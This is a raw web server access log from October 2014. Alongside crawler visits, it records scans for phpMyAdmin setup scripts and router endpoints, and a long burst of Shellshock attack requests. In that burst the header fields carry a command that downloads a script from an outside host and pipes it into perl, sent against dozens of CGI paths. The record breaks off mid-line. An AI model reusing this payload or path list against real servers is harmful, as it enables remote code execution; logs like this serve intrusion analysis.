Gecko) Chrome/38.0.2125.104 Safari/537.36" +123.125.71.112 - - [30/Oct/2014:16:58:21 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.141 - - [30/Oct/2014:16:59:05 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +79.141.163.26 - - [30/Oct/2014:17:54:52 +0200] "GET /cdcd/cdc/cd.php HTTP/1.1" 404 416 "-" "-" +79.141.163.26 - - [30/Oct/2014:17:54:53 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +79.141.163.26 - - [30/Oct/2014:17:54:53 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +79.141.163.26 - - [30/Oct/2014:17:54:54 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.85 - - [30/Oct/2014:18:02:41 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.177 - - [30/Oct/2014:18:03:55 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +211.67.208.79 - - [30/Oct/2014:18:10:38 +0200] "GET /nunu/nun/nu.php HTTP/1.1" 404 416 "-" "-" +211.67.208.79 - - [30/Oct/2014:18:10:39 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +211.67.208.79 - - [30/Oct/2014:18:10:40 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +211.67.208.79 - - [30/Oct/2014:18:10:41 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.108 - - [30/Oct/2014:19:32:25 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.182 - - [30/Oct/2014:19:34:25 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.30 - - [30/Oct/2014:19:51:59 +0200] "GET /ftp/public/pictures/gallery/raatihuone_small.jpg HTTP/1.1" 200 113011 "http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)" +123.125.71.74 - - [30/Oct/2014:20:21:38 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.185 - - [30/Oct/2014:20:28:35 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +157.55.39.160 - - [30/Oct/2014:20:42:58 +0200] "GET /robots.txt HTTP/1.1" 404 448 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.160 - - [30/Oct/2014:20:43:19 +0200] "GET /robots.txt HTTP/1.1" 404 446 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +157.55.39.160 - - [30/Oct/2014:20:43:19 +0200] "GET /robots.txt HTTP/1.1" 404 445 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" +194.63.140.244 - - [30/Oct/2014:20:43:24 +0200] "GET / HTTP/1.1" 200 460 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +194.63.140.244 - - [30/Oct/2014:20:43:24 +0200] "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +194.63.140.244 - - [30/Oct/2014:20:43:24 +0200] "GET /HNAP1/ HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" +123.125.71.95 - - [30/Oct/2014:21:31:10 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.159 - - [30/Oct/2014:21:32:26 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.182 - - [30/Oct/2014:22:19:47 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +84.251.84.212 - - [30/Oct/2014:22:19:54 +0200] "-" 408 0 "-" "-" +109.240.176.177 - - [30/Oct/2014:22:35:41 +0200] "GET /favicon.ico HTTP/1.1" 404 391 "http://88.192.69.68/ftp/public/pictures/xperia_amazonbill.jpg" "Mozilla/5.0 (Linux; U; Android 4.4.3; fi-fi; HTC One Build/KTU84L) AppleWebKit/537.16 (KHTML, like Gecko) Version/4.0 Mobile Safari/537.16" +109.240.176.177 - - [30/Oct/2014:22:36:02 +0200] "-" 408 0 "-" "-" +66.249.78.126 - - [30/Oct/2014:22:38:54 +0200] "GET /robots.txt HTTP/1.1" 404 446 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +66.249.78.126 - - [30/Oct/2014:22:38:54 +0200] "GET /uswhsonthopexgbh.html HTTP/1.1" 404 451 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +123.125.71.70 - - [30/Oct/2014:23:18:33 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.152 - - [30/Oct/2014:23:19:46 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +91.153.113.250 - - [31/Oct/2014:00:19:14 +0200] "-" 408 0 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:21:16 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:21:16 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:21:17 +0200] "GET / HTTP/1.0" 200 490 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:18 +0200] "GET /cgi-sys/ HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:19 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:19 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:19 +0200] "GET /cgi-sys/suspendedpage.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:20 +0200] "GET /xul/ HTTP/1.0" 404 442 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:21 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:22 +0200] "GET /gitweb/ HTTP/1.0" 404 445 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:22 +0200] "GET /gitweb.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:23 +0200] "GET /gitweb/gitweb.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:20 +0200] "GET /cgi-bin/status HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:23 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:24 +0200] "GET /cgi-bin/php HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:26 +0200] "GET /cgi-bin/php4 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:25 +0200] "GET /cgi-bin/php5 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:28 +0200] "GET /cgi-bin/php.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:27 +0200] "GET /cgi-bin/php-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:29 +0200] "GET /cgi-bin/firmwarecfg HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:30 +0200] "GET /cgi-bin/%2f/admin.html HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:31 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:30 +0200] "GET /cgi-bin/admin.html HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:32 +0200] "GET /sys-cgi HTTP/1.0" 404 445 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:34 +0200] "GET /cgi-bin/tree.php HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:35 +0200] "GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:37 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:36 +0200] "GET /cgi-bin/hello HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:37 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:38 +0200] "GET /cgi-bin/status/status.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:39 +0200] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 459 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:39 +0200] "GET /wwwboard.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:40 +0200] "GET /wwwadmin.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:41 +0200] "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:42 +0200] "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:42 +0200] "GET /webtools/bonsai/cvslog.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:42 +0200] "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:45 +0200] "GET /users/scripts/submit.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:45 +0200] "GET /userreg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:46 +0200] "GET /upload.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:46 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:46 +0200] "GET /test.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:47 +0200] "GET /template.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:48 +0200] "GET /submit.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:50 +0200] "GET /site_searcher.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:50 +0200] "GET /shop/normal_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:51 +0200] "GET /shop/member_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:52 +0200] "GET /setpasswd.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:52 +0200] "GET /servers/link.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:53 +0200] "GET /scancfg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:53 +0200] "GET /sampleposteddata.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:54 +0200] "GET /sample04.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:54 +0200] "GET /sample03.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:54 +0200] "GET /sample02.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:55 +0200] "GET /sample01.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:55 +0200] "GET /ROADS/cgi-bin/search.plHTTP/1.0" 404 229 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:21:56 +0200] "GET /reviews/newpro.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:56 +0200] "GET /redirects/redir.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:56 +0200] "GET /quikstore.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:57 +0200] "GET /quikmail/nph-emumail.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:57 +0200] "GET /pub/english.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:21:59 +0200] "GET /print.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:00 +0200] "GET /photo/manage.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:00 +0200] "GET /parse_xml.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:01 +0200] "GET /page.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:02 +0200] "GET /newsletter.shHTTP/1.0" 404 219 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:03 +0200] "GET /newpro.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:03 +0200] "GET /ncbook.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:04 +0200] "GET /musicqueue.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:05 +0200] "GET /ministats/admin.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:05 +0200] "GET /megabook/admin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:06 +0200] "GET /main.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:07 +0200] "GET /login.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:08 +0200] "GET /left.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:08 +0200] "GET /infosrch.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:09 +0200] "GET /index.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:10 +0200] "GET /html/cgi-bin/cgicsoHTTP/1.0" 404 225 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:12 +0200] "GET /Gozila.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:13 +0200] "GET /fcgi-bin/echo2HTTP/1.0" 404 220 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:13 +0200] "GET /fcgi-bin/echoHTTP/1.0" 404 219 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:13 +0200] "GET /ez2000/ezman.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:14 +0200] "GET /ez2000/ezboard.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:14 +0200] "GET /ez2000/ezadmin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:15 +0200] "GET /enter_bug.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:15 +0200] "GET /emumail.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:16 +0200] "GET /download.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:17 +0200] "GET /details.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:17 +0200] "GET /debug.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:19 +0200] "GET /dcforum.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:20 +0200] "GET /dcadmin.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:21 +0200] "GET /CSNews.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:22 +0200] "GET /create_release.shHTTP/1.0" 404 223 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:22 +0200] "GET /cp/rac/nsManager.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:23 +0200] "GET /connector.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:23 +0200] "GET /cgistartHTTP/1.0" 404 214 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:24 +0200] "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:24 +0200] "GET /cgi-sys/signup.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:25 +0200] "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:26 +0200] "GET /cgi-sys/randhtml.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:26 +0200] "GET /cgi-sys/mchat.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:27 +0200] "GET /cgi-sys/helpdesk.cgi HTTP/1.0" 404 458 "() { :; }; curl 